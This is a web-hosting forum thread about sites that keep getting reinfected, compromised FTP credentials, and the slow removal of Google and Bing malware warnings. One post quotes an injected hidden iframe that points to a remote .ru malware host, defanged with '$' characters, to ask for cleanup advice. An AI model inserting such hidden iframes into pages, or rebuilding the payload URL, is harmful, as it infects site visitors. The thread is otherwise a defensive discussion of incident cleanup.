Attacks - are they still happening?

[DVHost]

Here's a good example...

I have a customer (a developer) with some 25 sites in his account. Since May he has been hacked left and right. His developers swear they were cleaning the sites, their own computers, changed passwords etc. Every three days, they would get hit again.

I finally had enough and I told my customer that I would prove to him that his developers are second rate hacks who don't realize that their own local machines are infected. He said, "That's not possible, they cleaned everything." I said, "Trust ME!".

I changed his passwords, painfully cleaned his websites by hand (I've mastered this) deleted everything from the servers and uploaded all clean sites. A masterpiece!

I kept his credentials from him for 7 days. In that time, everything remained unhacked, pristine!

I gave him the password on the eve of the 7th day. Three days later, all hacked again.

People are hitting infected websites, their local machines are getting infected, the passwords are being found and it starts all over again.

At this stage of the game weak passwords and compromised local computers are to blame.

[fbeals]

Quote:

Originally Posted by DVHost

Here's a good example...
I have a customer (a developer) with some 25 sites in his account. Since May he has been hacked left and right. His developers swear they were cleaning the sites, their own computers, changed passwords etc. Every three days, they would get hit again.
I finally had enough and I told my customer that I would prove to him that his developers are second rate hacks who don't realize that their own local machines are infected. He said, "That's not possible, they cleaned everything." I said, "Trust ME!".
I changed his passwords, painfully cleaned his websites by hand (I've mastered this) deleted everything from the servers and uploaded all clean sites. A masterpiece!
I kept his credentials from him for 7 days. In that time, everything remained unhacked, pristine!
I gave him the password on the eve of the 7th day. Three days later, all hacked again.
People are hitting infected websites, their local machines are getting infected, the passwords are being found and it starts all over again.
At this stage of the game weak passwords and compromised local computers are to blame.

The Clients need to remove their password from the FTP programs, as that seems to be where the infections are finding them.

My clients had also been experiencing the same problems as described above until I convinced them that their local machines were being infected.

Now it is the problem with getting Google to remove their warning tags that is causing me a loss in revenue.
Clients don't realize now that the damage is done that moving to a different host is not going to remove the warnings any faster.
I've already cleaned their sites and submitted the sites for independent review.

Does anyone have a faster way to get the Google warnings removed any faster?

[chungmike]

Quote:

Originally Posted by fbeals

Now it is the problem with getting Google to remove their warning tags that is causing me a loss in revenue.
Clients don't realize now that the damage is done that moving to a different host is not going to remove the warnings any faster.
I've already cleaned their sites and submitted the sites for independent review.
Does anyone have a faster way to get the Google warnings removed any faster?

From my experience with removing the Google warning.....you just follow the instructions in how to get the warning removed (link on the warning page).
I've gotten very good with removing malicious code from webpages and submitting the page for review at Google. The warning page is removed a few hours after my submission.
If you're submitting it correctly (and quickly) to Google, you can just tell your customer that all will be back to normal after a few hours.

[fbeals]

Quote:

Originally Posted by chungmike

From my experience with removing the Google warning.....you just follow the instructions in how to get the warning removed (link on the warning page).
I've gotten very good with removing malicious code from webpages and submitting the page for review at Google. The warning page is removed a few hours after my submission.
If you're submitting it correctly (and quickly) to Google, you can just tell your customer that all will be back to normal after a few hours.

I must be missing something, I clean the code and have repeated submitted for review, and nothing

[mdwatkin]

I sure wish there was a way to get Google to move on this issue faster, but in the last 3 months I've been clearing sites - no way that I've found. Some say to email appeals@stopbadware.org who will verify the site and notify Google that its fixed, takes 10-14 days sometimes. What a PITA!

[Gene Crain]

The Hidden files was key for me. I will suggest using captcha to protect your forms.

[JoshK]

If anyone gets stuck with "hidden" files, or already has a local copy that is known clean they wish to upload, they can delete the entire domain directory using ftp/sftp(unix only)/webshell OR put in a ticket asking us to delete the directory. If you're struggling with one, speak up in a ticket that you need some help we'll do our best to get you going in the right direction. More than a few times someone has put in a ticket who has complete clean backups and i've been able to wipe it clean in minutes, they refresh all their passwords, upload their clean copy and been repaired with very little effort.

I do think bad client practices were a key part of why this attack was so successful. Over the last few years virus software / os updates / browser updates have stayed on the ball and been pretty quick to fix weaknesses for us. People in general got used to not worry about security and used really easy to guess password that were never rotated.

You would not believe how many passwords, if one were to generate a password list contain the user name, the word password, the clients name and birthday or age etc. Weak easy to guess passwords allowed hackers to get a foot hold. Minor weaknesses in some software allowed them to see other user directories they could attempt other guesses on over time. Get a few sites "peppered" across the web and you're bound to land a few visitors that are the actual web hosts or worse, developers and resellers. Since these trojan-like programs that populated did very little to end users i think they circulated for a long time (possibly years) collecting information from all over without anyone catching even a hint. This allowed someone out there to build rather large lists of saved passwords over time. It was when someone actually USED all of that information in giant waves that it attracted attention and caught everyone off guard!

I've seen very little (close to none) cases that are "new" pop up. It's not that they haven't tried. Our new monitoring setup sees attempts and activities, but with our much stricter password policies, ftp policies, firewall, and interaction of all of the above, we see suspicious activity often when it begins and shut the hacker down mid action. Just a few wrong guesses and the IP can't access the network. There will always be a few people out there with nothing better to do than attempt a hack, but if every one stays on the ball with the end users I think we can keep the hackers success rate minimal if not a complete 0.

[Danl]

This is just another problem with the internet, one group of people (google) gets too much power and makes it 10X harder to do what you need to do. I will say google has done more good than bad, but after I dealt with google to have them remove the malware warning from my sites I hope to never deal with them again.

Just my two cents as a web hoster, not a vortech employee.

[nickp]

It looks like bing.com (formerly live.com aka Microsoft) is mimicking google with the warnings. They also require you to create an account, verify the site, and wait before removing the warning. One of my sites has had this warning for at least 6 days and it is perfectly clean:

"Careful!
The link to this site is disabled because it might download malicious software that can harm your computer. Learn more
We suggest you choose another result, but if you want to risk it, visit the website."

[Danl]

What browser are you using nickp?

[nickp]

This happens in all browsers. It's on the search engine results page on bing.com. I will send you a PM with the search term to see it.

[Danl]

Thanks Nick, good to know that microsoft is attempting to catch up to the other internet police (google), now if only they could make IE safe...

[nickp]

I'd rather have IE just go away lol

[chungmike]

I have one website that keeps getting reinfected. This might be some new method of infection because I've gotten very good at cleaning out infections and know what to look for and what to do.

This particular infection inserts this line under the body tag: (I've added $ in just to break up the code to make sure viewers don't get infected)

<div style="display:none"><iframe src="ht$tp://bio$zavr.ru$:8$080/in$dex.php" width=898 height=703 ></iframe></div><div style="display:none"></div>

Avast Antivirus catches it every time, so I knew my site kept getting infected. Then I'd do the same thing....find all the files that got infected, remove the code, and change my password. A few hours later, my website would get reinfected! Google's Attack page also kept showing up, and it has killed my business this week.

I then decided to totally nuke the website by turning off web services, turning it back on a while later, uploading the entire website, then change the password again. Before I uploaded the website, I scanned all the files with Avast...and it was clean.

Because I nuked the website, I must have nuked the SSL certificate I was using, so the existing SSL certificate was useless. I decided to upload the website to another server just to test it....and I changed the nameservers of the domain name to point to the other server.

24 hours have passed and the files are infected again! Even with the domain name pointing somewhere else, the files in the VT server got reinfected. (the files in the other server are still clean)

Will turning off web service wipe clean a website directory?
If this has happened to you, what did you do to clean it? Obviously I missed something, but I know I was very thorough in cleaning an infection.

[dpyers]

Yhe only thing that comes to mind immediately would be to check above the webroot in the ftproot.